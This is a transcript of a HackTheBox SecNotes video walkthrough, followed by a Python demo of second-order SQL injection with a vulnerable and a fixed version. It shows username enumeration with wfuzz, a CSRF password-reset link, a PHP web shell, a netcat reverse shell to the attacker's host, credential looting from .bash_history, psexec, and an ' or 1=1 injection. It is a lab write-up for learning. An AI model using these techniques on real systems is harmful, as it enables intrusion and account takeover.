HackTheBox - SecNotes
Key Takeaways
This video walks through the SecNotes machine: nmap recon (IIS on port 80 and SMB, Windows 10 Enterprise build 17134), username enumeration with wfuzz based on the login page returning different error messages for unknown users and bad passwords, a change-password page with no CSRF token, no old-password check and GET support, so a link sent through the contact form resets the user tyler's password, credentials for a writable SMB share found in his notes, a PHP web shell dropped into that share and executed through a second web server on port 8808, a low-privilege shell via netcat, the administrator password recovered from the Bash on Windows .bash_history, and finally the unintended path: a second-order SQL injection in home.php, traced by static analysis of the downloaded PHP, where a username that was stored safely through a prepared statement at registration is later concatenated into a query straight from the session.
Full Transcript
What's going on YouTube, this is IppSec doing SecNotes from Hack The Box, which was a relatively easy box, but an even easier box if you found the unintended SQL injection that lets you bypass the first part of the box, which was a cross-site request forgery type of attack. So you get presented a web application and you can register a user. You register the user and, upon looking at the features of the site, you see that you can create notes, change your password and send a note to the admin if you want. Go to change your password and you'll notice that it doesn't require you to type your old password, doesn't have a cross-site request forgery token, and it's also accessible through a GET request, leaving it to be a really easy cross-site request forgery attack. You send a link to the admin, he clicks it, it changes his password, and then you're presented with a way to drop files on the web server. You drop a web shell, get a low privileged shell, and then go hunting through the box. You notice that Bash on Windows is installed, and if you pillage through those files you'll find the administrator password in the .bash_history file. So enough talking, let's just jump in.

As always, the first thing we do is run nmap with -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap folder and call it secnotes, and then the IP address, which is 10.10.10.97. This can take some time to run so I've already run it. Looking at the results we see just two ports are open: we have Microsoft IIS on port 80 and it's running httpd 10.0, so we know this is gonna be like Windows 10 or 2016, and then we also have SMB open and it's saying Windows 10 Enterprise 17134. We can kind of get an idea of a build date by just googling this. If we, whoops, google that header, we may see like a... well that's odd, good crash Firefox, but move this back up and see what happens; I wouldn't remember the size of the window. Okay, start a new session, let's Google this, and do we have 17134 on this page? We do, so we know this is gonna be the 1803, Redstone 4, April 2018 update, so it's probably sometime between April and October of 2018. So let's just keep moving on. This information doesn't look that interesting; we can get the machine name from this NetBIOS computer name, the workgroup, and that's about it.

So let's just go over to 10.10.10.97 and see what the actual website looks like. We have a login form and it just has username and password, so let's try logging in with some default usernames like admin / password. Let's change this to never save, and we get "no account found with that username". Let's try administrator / password. Let's try some basic SQL injection; if this is successful either way we'll log in, or we'll say this error message will move. It does not, so let's try creating an account. Let's create the account ipsec, we'll create the password of password, logged in. Now let's put the username ipsec, the password we'll put something, and we get "the password you entered is not valid". So we now know we have a way to enumerate valid usernames. So what I'm going to do is send this over into Burp Suite, so if we go here, turn intercept on, do ipsec / please subscribe, look at Burp Suite, we see it does a POST to login. We've got a username and password; we don't have any like CSRF tokens to worry about. So let us go to our terminal, wfuzz -h, and we're gonna do a wfuzz and try to brute force a bunch of usernames. So let's do wfuzz -c for output with colors, then the next thing we want to do is specify a wordlist, so -w /usr/share/seclists/Usernames/Names/names.txt. Then the next thing we want to do is specify -d for POST data, so -d username=FUZZ and then password=pleasesubscribe, and then the URL http://10.10.10.97, and we get a bunch of 302s because I forgot /login.php I believe. Yep, login.php, and then we need to do probably --hs to hide; I forget what s stands for, but this is gonna be hiding if the page contains text, and the text we want to search for is invalid username. So let's turn Burp Suite off, log in again, put a bad username, "no account found", copy this, paste this in and let this go.

So our account was ipsec and we used the password of password, so we can log in and then let's play with this page. The first thing I notice is we have a username and the email address, so we have a potential user on this application. Let's try a new note. Let's do the title of <center>ipsec</center>, "ipsec was here", save this note, and we can see everything is centered. We do a search on the page for ipsec; we see it is not doing any filtering whatsoever on this HTML, so we can do like a cross-site scripting attack. So if we wanted to do cross-site scripting attacks we'd have to have a way to link to this note, and how do you type a link to these notes? Let's copy this URL, paste this in, and instead of delete let's try view... and it just deleted my note. So it doesn't look like we can do anything there. We could send it to wfuzz and try to brute-force various things, but my guess is it's not going to be a vulnerability. So let's try other features of this application. Change password: we can change it to please subscribe, and then let's intercept this request, so turn it on, submit it, and let's see, we can drop that one, and now we're at the change password intercept. A few things to note: there's no like cross-site request forgery token, just like on login, and then it's also not asking us to confirm our old password. So anyone that goes to this page, you may be able to force them to change the password. So I'm going to send this over into Repeater and we're going to try just hitting go and seeing what happens. If we click render it doesn't show anything, so let's try changing the password for ipsec to please subscribe, and then we're going to change this request method into a GET, click go, and it looks like it updated our password because we don't see any error messages. So let us just go back into Firefox. We can disable Burp, we can sign out... that's what my clipboard content is. So log in as ipsec, paste my clipboard, and it did indeed change the password by just going to a URL.

So this is looking like it's going to be some type of cross-site scripting challenge just based upon all that, and the fact that it happens in the actual URL is nice because we don't have to do a bunch of JavaScript and have like a JavaScript submit a POST request. I forget what video I've done that on; it was one of the very early Hack The Box videos. I'll try to put a link in the comments or description of the video so you can go there if you want to see how to do that type of stuff. But I'm gonna keep it easy here. We go to the contact and let's just see if he follows links, so we're gonna send him to our box which is 10.10.14.2. And it looks like wfuzz has finished and the only account it found was tyler. So if we do nc -lvnp 9001... actually what we wanted to do, ifconfig tun0, yes I am 10.10.14.2, let's direct him to 9001, send this, and immediately get a connection back. We can see the user agent is Windows PowerShell, which is odd, but I'm guessing that's just because it's coded to immediately navigate to URLs you send to Tyler. So let's see if it actually follows links like on the page. So let's create a new directory, mkdir www, and what we're going to do is create test.html, and in this we're just going to do an iframe with src= http... but we can just copy and paste, and go to Burp, copy this, do http://10.10.10.97/ that... oh no, I screwed up, there we go, get rid of this slash, okay, close the iframe, and we'll change the password so we test it on ourselves first, and we'll just change it to please subscribe. Okay, then we just host this: python -m SimpleHTTPServer, open on port 80. So if I go to 10.10.14.2 we have test.html. I click this, we see "password updated", and if I sign out, go here, let's cat test, copy please subscribe and try to login, we get in. So let's start the web server again and send a link over to Tyler, so http://10.10.14.2/test.html, and that's going to direct Tyler to a page. There we go, and if we sign out and sign in as Tyler... it did not work. Let's try this again, ipsec, please subscribe, and instead of sending him through an iframe and all that stuff, maybe PowerShell was not doing that. Let's just send this... actually we can verify if this is working, so let's comment this out and then we can do another iframe with src=http://10.10.14.2/test, host this again, and if we go to the page, we go to test.html, we see we get it and then we send another GET request. So if we send this link over to Tyler we'll see if he follows it. So contact us, http://10.10.14.2/test.html, sent; he gets it but he doesn't follow the iframe, and that's again probably because he is using Windows PowerShell and this is not an actual web browser, so the logic on it is pretty dumb. So to work with that, all we're going to do is copy the URL that we're trying to direct him to and go to contact us and send him directly there. So this whole logic thing is also how you know you don't have to do any fancy cross-site scripting, because the web browser is dumb. So let's sign out, let's try logging in with tyler / please subscribe, and we get logged in.

We get a note of "Mmm sticky buns", I'll click it, a recipe, yeah, I don't know. And "new site": we have what looks like to be an SMB share, a username and a password. So let's test these with the program called smbmap. So the syntax is smbmap -h, and this should be in Kali, if not you just have to install it, so let's just search smbmap; is it? It is. So the syntax we want is smbmap -u for username, which is tyler, -p the password, which is going to be this "92" thing, then -H for the host, and that's 10.10.10.97. It's gonna find the SMB ports and then list what shares are available, and you can see there's a share that is new-site that is READ, WRITE. So let's do smbclient -U username%password and then we want //10.10.10.97/new-site. We can do dir and we see there's an iisstart.htm and iisstart.png, so we have a page. If we try to go to this though, iisstart.htm, we get 404 not found, so there's something we're not seeing here.

So the first thing I'm going to do is nmap -v, we'll do --max-retries, set that to zero, and -v is going to show us open ports as it scans, --max-retries 0 is going to make this go a bit faster, we'll do -T5 to make this super aggressive, and then we just want -p- 10.10.10.97, so just checking if there's any ports open on this that we have missed. We have 80, 445, and then we can also go over into Burp, and if we just do a GET on / and click go, we get viewing notes, that's fine. Let's change this to, let's see, is there a host header? Yep, Host: secnotes.htb, just in case there's any type of like virtual host routing, because we know the hostname of this box is secnotes.htb, as nmap tells us that as well. So doing this we get the same exact page, so chances are there's nothing unique there. Let's go back in the terminal, and we don't have any extra ports open yet, and there we go, we have finished and we have one extra port open, that is 8808. So let's go and check this 8808 and we get that welcome page. So go back over into the smbclient and let's create various scripts. So let's try a PHP first, so shell.php, and we'll just do PHP system() and then $_GET['ipsec']; instead of $_GET we'll do $_REQUEST so it can be done with POST or GET requests. And if we put shell.php, /shell.php, a 500 internal server error; ?ipsec=whoami, we get secnotes\tyler, so we definitely have code execution here.

Let us get a reverse shell, and we can either do PowerShell one-liners or we can just upload netcat. I like normally just uploading netcat because I find it handles like the TTY better. So netcat windows, let's go to nc64 windows, there we go, I always get it from this eternallybored site, save link as, it's in Downloads, it's fine, so mv Downloads/netcat..., okay, unzip netcat, we got nc64 as well. So let's put nc64.exe, and nc -lvnp on port 9001, and then in our shell we just want to do nc64.exe 10.10.14.2 9001 -e powershell. We go back to a terminal, we have a low privileged shell on this box, I believe. We do whoami, it will take a while, but it does come back as tyler. We can do whoami /all, see what tokens we have, and it doesn't look like we have any commonly abusable tokens that would allow us to do like Juicy Potato; I forget what name that is off the top of my head but I should definitely have it memorized, it's like the SeImpersonate token, that's what it is. So we don't have that, so nothing too interesting there.

So let's go cd C:\, cd users\tyler\desktop, and then we can do Get-Content user.txt and then Measure-Object, what is it, -Character, and we can see user.txt is 32 characters long, which is an MD5 sum. We also have some weird stuff like bash.lnk. If we do Get-Content bash.lnk we do see it is a link that is going to Windows\System32\bash.exe, so we have Bash on Windows installed. We just type bash, it looks like the TTY is screwed up, but we are now literally running bash on Windows and we're in /mnt/c/Users/tyler/Desktop. We go to just /, we're at the root of the filesystem; if we do whoami we're the root user. So let's try, was it /mnt/c, cd users/administrator, and we still can't get there. So even though it's showing us as the root user, this is kind of a guest, just a VM or something, because we're not admin on the box. So let's just go to /, and instead of going into /mnt let's go into /root. ls -la... what is filesystem? file filesystem, it's a directory, ls filesystem, looks like a blank directory. We do see that .bash_history does have contents in it, so let's cat this, and we can see a username and password on this box, and that's the same exact syntax as we had done to access the box as tyler. So let's just copy this, rename a window to "lo priv", create a new one, paste this in, instead of 127.0.0.1 let's do 10.10.10.97, and we are on the box as administrator now. So cd users/administrator and then we can go into desktop and then get root.txt, then we just do wc -c on root.txt, 34 characters, I guess there may be two line breaks or something in there, but I can assure you this is the root.txt of the box.

So let's go back, exit out of this, and go back to just plain old PowerShell. If you didn't want to execute bash or you had problems with that TTY, you could always go into AppData\Local\Packages, and let's see, where is it, this Canonical one, and that's gonna be where Windows actually installs the VM, or Bash on Linux, or Bash on Windows, whatever it is, that weird thing that allows you to run bash on Windows. So we can go into this and then we've got rootfs and then we're in that as well, so dir, and then Get-Content .bash_history, and we can see the same exact thing. So let's see here, we're just viewing the filesystem as admin. I do have Impacket installed on this so we can just do psexec and then administrator@10.10.10.97, copy this password, paste it in, and it looks like it is gonna give us a shell on this box, come on, there we go, and if we do whoami we are nt authority\system. So that is how you do this box.

Let us go and do a little bit extra now. So there is an alternative path: if we went into Firefox, and let's go all the way back to the very beginning of this box, so home, let's sign out, and let's create a new user and let's do SQL injection in the username. So we'll do please subscribe' or 1=1, I think that will work, we'll do pass with a password, submit, and then type password and we get logged in and we have all the notes, and we can see the credentials this way. So let's examine exactly why this works and do a little bit of static code analysis, and the cool thing about this is we see all the notes: this is the notes of tyler, this is the notes of ipsec. So let us see why this works by downloading all the PHP files. So mkdir php, in here, and then run smbclient to, well again, do dir; we want to go into inetpub, cd \inetpub, I mistyped it, and then wwwroot, cd inetpub, there we go, cd into wwwroot, and then we'll just get all these files. And now that I did that, I wonder if this has the mget command, and mget *.php; that would be an easier way to do it, just use mget instead of doing what I did and doing gets on every single file, and mget is a multi get. So now we have all the PHP files, so we can search for things like grep, -B for before, -A for after, and then we can search for things like system *.php and see if this thing ever calls system. It does not. Let's search for, we'll do -i as well to make it case insensitive, powershell, cmd, sql, and we get a bunch. So let's see, it looks like generally 0xdf is using this $sql thing and he does this relatively every time, so we can just search for $sql to kind of filter out some of the noise, and we can see all the spots where this actually interacts with the database. So we see right here we're doing SQL, we've got question marks here, a prepared statement, so we can ignore this submit note. Move up, we have INSERT INTO users username password, a prepared statement, register. Let's see, was that SQL? question mark, prepared statement; question mark, prepared statement; and here we have WHERE is equal to username and then does a statement, but if the user can control this value maybe we'd have SQL injection here. This is on home.php. Go up, the next one, prepared; change password is prepared as well. So the only time the creator didn't use a prepared statement is right here, so let's look at home.php, but let's just look at how username gets declared. So let's do the grep again, we'll do username=, can we... so on register.php it's setting it to the variable, so this is definitely user controlled right here. Let's see, auth.php, username is equal to $_SESSION['username'], and their session, let's see, how does this get set? db, username, empty, trim; I believe the session is getting it from the POST request the user sends, but we can verify this by just doing another grep, and this time we'll do _SESSION, space, I think, just _SESSION, and then let's filter out some of the noise. Before we do that, home.php will require auth and db, so we should be able to do auth.php db.php home.php; naturally, since it's the session variable, we need to do them all because it can write it in any file and then it pulls it from that session. So let's just do this and go through all the noise. So let's see, session, can we specify username, change these single quotes to double quotes and escape that, there we go. So on login.php the session is setting $_SESSION['username'] to this. If we look at the whole code, we have: if the password is correct, start a session and then write the username that was sent from the user into this. So you have a second order SQL injection, which means it's not a direct access to SQL but it's pulling it from a tainted resource that then causes the SQL injection. And this is somewhat common when developers get into the mindset of never trusting user input, when the mindset should be never trust any input, because just because it didn't come directly from the user doesn't mean it wasn't created by the user in the first place. In this case the user created that database field for the username and there was a prepared statement around that so it wasn't injectable, but it just got stored in the database and became a ticking time-bomb for when code grabbed it from that database and then used it in an unsanitized way. So I hope you guys enjoyed that, and that's the box. Take care and I will see you all next week.
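The second-order injection the video traces through register.php, login.php and home.php, reproduced as an added example (not the box's PHP and not IppSec's code). It assumes an in-memory SQLite database in place of the box's real one, with constructed users, notes and table names chosen for the demo; the three handler functions mirror the flow described above: a prepared INSERT at registration, a prepared SELECT at login that copies the submitted username into the session, and a home page that trusts the session value and concatenates it into SQL. A hardened home page with a bound parameter sits beside the vulnerable one so the difference is visible on the same stored payload.

```python
import sqlite3

# Constructed sample data for the demo (not the box's real database): two users, each with a note.
SEED_USERS = [("tyler", "tyler-pass"), ("ipsec", "password")]
SEED_NOTES = [("tyler", "new-site share credentials"), ("ipsec", "ipsec was here")]


def build_db():
    """In-memory SQLite stand-in for the application's users and notes tables."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("CREATE TABLE notes (username TEXT, title TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    db.executemany("INSERT INTO notes VALUES (?, ?)", SEED_NOTES)
    db.commit()
    return db


def register(db, username, password):
    """register.php equivalent: a prepared statement, so the payload is stored
    verbatim rather than executed. This is where the time bomb is planted."""
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    db.commit()


def login(db, username, password):
    """login.php equivalent: also prepared. On success it copies the submitted
    username into the session, which is the tainted value home.php later trusts."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return {"username": row[0]} if row else None


def home_vulnerable(db, session):
    """home.php as described in the video: the session username is spliced
    straight into the query because it 'did not come from the user'."""
    sql = "SELECT title FROM notes WHERE username = '%s'" % session["username"]
    return [title for (title,) in db.execute(sql)]


def home_fixed(db, session):
    """Same query with a bound parameter: the stored payload stays a plain string."""
    sql = "SELECT title FROM notes WHERE username = ?"
    return [title for (title,) in db.execute(sql, (session["username"],))]


def run_attack(payload="' OR 1=1 -- -"):
    """Register the payload as a username, log in with it, then hit both sinks.
    Returns (vulnerable_result, fixed_result)."""
    db = build_db()
    register(db, payload, "password")
    session = login(db, payload, "password")
    assert session is not None, "prepared login still accepts the literal username"
    return home_vulnerable(db, session), home_fixed(db, session)


if __name__ == "__main__":
    leaked, safe = run_attack()
    print("vulnerable home.php returned:", leaked)  # every user's notes
    print("fixed home.php returned:", safe)         # nothing: no notes belong to that username
```

Run it and the vulnerable sink returns every user's notes while the fixed one returns an empty list, which is the same "all the notes" result the video gets after registering an injected username and logging in normally. The check worth carrying into code review is the one the video does with grep: find every query and every variable that feeds it, and treat anything that ever passed through a request, a database row or a session as untrusted, regardless of how many hops ago it was validated.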
Original Description
01:05 - Begin of recon
02:45 - Checking out the website
03:50 - Using wfuzz to enumerate usernames
05:45 - Logging in with an account we created
07:23 - Checking out Change Password and noticing it does this poorly
09:25 - Using the contact form, to see if tyler will follow links
14:14 - Changing Tyler's password by sending him to the ChangePassword Page
15:00 - Logged in and find SMB Share with credentials.
16:15 - Found a webshare but not sure the directory it executes from. Begin hunting for a different webserver.
17:48 - Port 8808 found via nmap'ing all ports. Creating a php script to gain code execution
19:15 - Downloading netcat for windows to use as a Reverse Shell
21:14 - Playing with Bash on Windows
22:35 - Finding the administrator password in ~/.bash_history
-- Box done
23:45 - Alternate way to find the .bash_history file
25:36 - Unintended way to bypass the CSRF. SQL Injection + bad Static Code analysis
In the Holiday video, I do a bit more that may be helpful with card type attacks: https://www.youtube.com/watch?v=FvHyt7KrsPE&app=desktop